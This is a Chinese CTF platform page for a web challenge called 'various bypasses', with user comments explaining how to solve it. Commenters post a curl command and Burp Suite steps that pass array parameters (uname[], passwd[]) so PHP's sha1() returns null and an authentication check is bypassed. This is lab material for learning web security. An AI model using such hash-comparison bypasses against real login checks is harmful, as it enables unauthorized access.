各种绕过哟WEB 未解决

分数: 30 金币: 3
题目作者: harry
一  血: jiangdie666
一血奖励: 2金币
解  决: 5874
提  示:
描  述:
各种绕过
评论
SLfanCTF 1年前

数组sha1为空,传入数组绕过

回复 0

zhuizhui 1年前

POST /?id=margin&uname[]=1 passwd[]=11 数组绕过sha-1

回复 0

ahsjezyt 1年前

flag{********}

回复 0

奕生 1年前

bp可以,就是要把GET请求改成POST请求

回复 1

xlogsrc 1年前

curl -X POST "http://117.72.52.127:11657/?uname[]=a&id=margin" -d "passwd[]=b"

回复 0

liuguowang75 1年前

passwd[]=2无法提交,最终还是用python脚本解决了,两次这样子了

回复 1
theo1234 1年前

请问die终止了执行,python脚本还能获得结果吗

回复 0

liuguowang75 1年前

要触发输出 flag,可以通过构造如下请求: GET id=margin,uname[]=1 POST passwd[]=2

回复 0

featherwit001 1年前

sha1数组绕过,使用bp没有问题,需要GET和POST同时传参, 先url/?id=margin&uname[]=1 用bp劫持 然后修改报文 GET 变为 POST。在报文末尾添加: Content-Type: application/x-www-form-urlencoded (空行)passwd[]=2

回复 4
Azureli 11月前

我封你为真正的王者

回复 0

Ksumrng 1年前

使用bp从get改到post需要注意,在报文末尾添加: Content-Type: application/x-www-form-urlencoded。或者改好post数据后鼠标点一下数据包内容右边的post数据项或header,bp就可以自动添加content-type

回复 6

HK1ng 1年前

sha1绕过和md5绕过方式相同

回复 0

2726123464 1年前

flag{******} 看源代码被蒙了,不对欸

回复 0

WriteUp

image
harry

3 金币

评分(5)

解题动态

沐头人 攻破了该题 7小时前
QIANCJ 攻破了该题 11小时前
18599298628 攻破了该题 19小时前
huasan2410 攻破了该题 1天前
serein007 攻破了该题 1天前
追风的牛牛 攻破了该题 1天前
手可摘星辰2 攻破了该题 1天前
花猫咪 攻破了该题 2天前
gm26ctf 攻破了该题 2天前
1234165 攻破了该题 2天前
kimol 攻破了该题 3天前
nonlvyx 攻破了该题 3天前
qqai 攻破了该题 4天前
路人甲1123 攻破了该题 5天前
AWDAI 攻破了该题 5天前
wauo3 攻破了该题 5天前
bilabu 攻破了该题 5天前
niubill 攻破了该题 5天前
青春小豆 攻破了该题 5天前
Versemos 攻破了该题 6天前
问题反馈